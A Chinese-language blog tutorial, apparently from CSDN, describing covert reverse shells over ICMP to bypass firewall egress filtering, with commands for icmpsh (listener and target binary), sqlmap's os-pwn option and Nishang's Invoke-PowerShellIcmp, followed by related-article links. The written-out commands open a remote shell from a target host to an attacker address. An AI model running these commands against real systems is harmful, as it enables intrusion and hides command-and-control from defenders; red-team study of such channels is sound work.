【基础篇】————4、隐匿攻击之ICMP

最新推荐文章于 2024-06-03 11:16:34 发布
最新推荐文章于 2024-06-03 11:16:34 发布
阅读量749 收藏 2
点赞数

隐匿攻击之ICMP

内部网络中的大多数系统都位于防火墙和公司代理之后,以便控制入站和出站Internet流量。防火墙可以阻止反向并绑定TCP连接。但是大多数情况下允许ICMP流量。因此,可以将此协议用作隐蔽通道,以便获取shell并在目标主机上远程执行命令。

这是一种古老的技术,在有限的环境中大多数时候都使用它来接收shell,但现在随着红队交战的蔓延,它可以作为另一种方法,通过使用ICMP流量和绕过出口过滤来执行命令。

工具icmpsh可用于有效地执行此攻击。Bernardo Damele将其导入到工具sqlmap中,该工具可以使用-os-pwn开关触发。

以下命令将禁用所有ICMP回应应答,这对于工具正常工作至关重要,并将启动一个等待来自目标主机的ICMP数据包的侦听器:

sysctl -w net.ipv4.icmp_echo_ignore_all=1
./icmpsh_m.py 192.168.100.3 192.168.100.4

icmpsh工具的GitHub存储库还包含需要在目标主机上传输和执行的二进制文件。以下命令将ICMP流量发送到主主机:

icmpsh.exe -t 192.168.100.3

shell将通过ICMP接收,并且可以通过此通道执行命令。

Daniel Compton开发了一个脚本来自动化该过程。此脚本所需的唯一输入是目标主机的IP地址。该脚本包含在GitHub上的icmpsh存储库中。

在线上还有各种其他工具,作为对像pix-c2这样的ICMP执行命令和控制的替代方案。

PowerShell

Nishang框架包含一个PowerShell模块,可以与icmpsh python脚本结合使用,以获得ICMP上的shell。在主机上,以下命令将等待任何传入的ICMP数据包。

./icmpsh_m.py 192.168.100.3 192.168.100.4

在目标主机上,PowerShellIcmp模块仅需要主机IP地址:

Import-Module .\Invoke-PowerShellIcmp.ps1
Invoke-PowerShellIcmp 192.168.100.3

将从主控主机接收连接。

参考

FLy_鹏程万里
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
浅析Icmp原理及隐蔽攻击的方式
MSB_WLAQ的博客
10-13 2473
一、ICMP隧道技术解析 1.icmp协议 Internet Control Message Protocol Internet控制报文协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用于网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用 ICMP协议主要提供两种功能, 一种是差错报文,一种是信息类报文。信息类报文包括回显请求和回显应答,以及路由器通告和路由器请求。常见的差.
隐蔽信道相关概念(持续更)
m0_37442062的博客
05-11 1万+
通常,黑客会使用隐蔽网络躲避防火墙和IDS等。通过不可检测的网络从目标主机窃取数据的网络被称为隐蔽信道,而这些流量在网络监控设备/应用和网络管理员看来像是一般的正常流量。两个端点用户可以利用隐蔽信道,进行无法被检测到的网络通信。 什么是隐蔽信道(covert channel)? 隐蔽一词意味着“隐藏或不可检测”,而信道是“通信模式”,因此隐蔽信道表示不可检测的通信网络。了解加密通信和隐蔽...
使用 Scapy 库编写 ICMP 重定向攻击脚本
最新发布
Flag少侠的博客
06-03 7557
ICMP重定向攻击ICMP Redirect Attack)是一种网络攻击攻击者通过发送伪造的ICMP重定向消息,诱使目标主机更新其路由表,以便将数据包发送到攻击者控制的路由器或其他不可信任的设备上。该攻击利用了ICMP协议的合法功能,但以恶意方式使用,从而劫持或中断目标主机的网络流量。
隐蔽信道学习
Fiverya的博客
01-09 1648
隐私隧道
隐匿攻击行为
weixin_46239998的博客
04-24 614
攻击行为隐匿
CTF——流量分析题型整理总结
热门推荐
小锤队长的博客
12-19 4万+
我见过的流量分析类型的题目总结: 一,ping 报文信息 (icmp协议) 二,上传/下载文件(蓝牙obex,http,难:文件的分段上传/下载) 三,sql注入攻击 四,访问特定的加密解密网站(md5,base64) 五,后台扫描+弱密码爆破+菜刀 六,usb流量分析 七,WiFi无线密码破解 八,根据一组流量包了解黑客的具体行为 例题: 一,ping 报文信息 (icm...
Spark性能优化指南——基础
02-25
在大数据计算领域,Spark已经成为了越来越流行、越来越受欢迎的计算平台之一。Spark的功能涵盖了大数据领域的离线批处理、SQL类处理、流式/实时计算、机器学习、图计算等各种不同类型的计算操作,应用范围与前景非常...
软件测试基本功之——WinRunner
03-04
 先说我和我们老大共同制定的一套方案(也是结合网上很多资料制订的),欢迎大家看了后给点意见,不要像上2那样,看的人比较多,但留言的一个都没,伤心啊,可能是我水平问题,相信以后会越来越好的。 自动化测试...
内网渗透系列:隐匿攻击方法
闵行小鱼塘
07-26 1357
学习并小结下各种隐匿通道方法
CTFHUB技能树-Misc-流量分析-ICMP
豆傻小饼干随记
01-13 7739
Tips:代码仅供借鉴学习,还请大家多多思考 ICMP-Data: # coding = utf-8 # --author:valecalida-- from os import system as get_hex # 调用tshark时需要将tshark加入环境变量,且脚本需要与流量包在一个路径下 get_hex("tshark -r icmp_data.pcap -Y \"icmp && icmp.type==8\" -T fields -e data > flag.txt
CTFHUB-流量分析-协议流量分析-ICMP
m0_64180167的博客
03-08 1772
我们打开然后放入wireshark中搜索icmp然后搜索ctfhub发现没有然后就看{我们从最底下开始往上翻从这里我们就发现了规律了 已经出现了ctf了 所以我们就只要将这个位置上组合起来就是flag。
一个简单的icmp攻击python脚本
m0_73896875的博客
07-06 173
payload = '我没有攻击你!ip = input('请输入ip地址:')@File :icmp攻击.py。@Author :星之尘。
ctfhub 杂项 --icmp
tansty_zh的博客
08-11 2075
ctfhub 杂项 技能树–流量分析–icmp–data 1.过滤icmp包 2.观察 从上面那个包开始有“{‘,到第二张的包后又有”}“,猜测可能是”{“ 到”}“之间相对应的位置的字母可能就是flag 3.记录 {c87eb99796406ac0b} 再加上ctfhub,flag为”ctfhub{c87eb99796406ac0b}“ 取得 {c87eb99796406ac0b}“ 取得 ...
Python 协议攻击脚本(三): ICMP扫描
酉酉的博客
04-26 2645
文章目录ICMP协议TypeICMP扫描数据包分析Python脚本 ICMP协议 互联网控制消息协议(英语:Internet Control Message Protocol,缩写:ICMP)是互联网协议族的核心协议之一。它用于网际协议(IP)中发送控制消息,提供可能发生在通信环境中的各种问题反馈。通过这些信息,使管理者可以对所发生的问题作出诊断,然后采取适当的措施解决。 Type ICMP...
ICMP重定向攻击
honest_gg的博客
12-20 2221
实验工具: ENSP(搭建拓扑) VM虚拟机(kali、win7) 1.环境配置 ENSP: 1.1 使用设备 1.2 ENSP设备配置 Kali(v8网卡) win7(v1网卡) 路由器配置 路由器配置查询 服务器配置 VM虚拟机: 1.3 VM虚拟机配置(kali、win7) ——具体IP,子网,网关配置方法如实验四一样 目的:让kali、win7可以通...
(转载)虚拟环境中的隐蔽信道
diaoyo2388的博客
06-01 533
来源于实习期间的一次Presentation,仅作科普之用。 隐蔽信道指允许系统进程以危害系统安全策略的方式传输信息的通信通道。或者说是不是被设计,或本意不是用来传输信息的通信信道。 通常分为两类。 (1)存储隐蔽信道,一个进程直接或间接写一个存储位置,被另外一个进程直接或间接读,从而传递信息。 (2)时间隐蔽信道,以某种方式modulate系统资源使用,从而影响了真实的响应...
网络-ICMP协议、Ping命令实现与ICMP攻击
关注网络安全、云原生安全
12-14 5225
简介 ICMP(Internet Control Message Protocol,网际控制报文协议)是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。 报文格式 ICMP报文分为两类:一类通知出错原因 ,一类用于诊断查询。 ICMP报文格式 类型:占一字节,标识ICMP报文的类型,从类型值来看ICMP报文可以分为两大类。第一类是取.
ICMP攻击实战及其简略防御方法
爱吃仡坨的Blog
08-07 5469
ICMP攻击实战及其简略防御方法
通信网理论基础:第五章 网络拓扑结构分析.pdf
06-30
第五章《通信网理论基础:网络拓扑结构分析》深入探讨了通信网络设计中的基础要素——网络拓扑。网络拓扑结构对于通信网的规划和设计至关重要,它是通信网络架构的核心组成部分,能够影响网络的可靠性、效率和灵活性...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值